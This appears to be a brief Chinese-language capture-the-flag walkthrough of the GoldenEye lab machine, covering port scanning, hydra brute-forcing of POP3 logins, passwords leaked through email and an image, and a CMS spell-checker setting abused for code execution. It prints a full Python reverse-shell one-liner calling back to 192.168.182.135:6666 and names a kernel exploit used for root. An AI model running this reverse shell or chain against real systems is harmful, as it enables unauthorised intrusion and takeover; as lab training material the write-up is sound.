网页提示有pop3服务在高端口，于是扫描端口，得到55006和55007，另外在sev-home源码底部发现2个登录用户名，hydra爆破：
Natalya bird Boris secret1!
于是telnet登录55007查看邮件，Natalya的2号邮件发现新的用户名和口令用来访问severnaya-station.com/gnocertdir：
xenia RCP90rulez!
在邮件里面拿到dr_doak的口令4England!然后登录CMS，在private_files里面找到/dir007key/for-007.jpg，解码其隐藏在详细信息中的base64得到admin口令：
xWinter1995x!
再次登录CMS，用RCE拿shell，SystemPaths里面的aspell写入python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.182.135”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’
TinyMCE的editor改为Google Spell类型就能反弹shell
最后用cc编译内核漏洞脚本37292.c成功提权
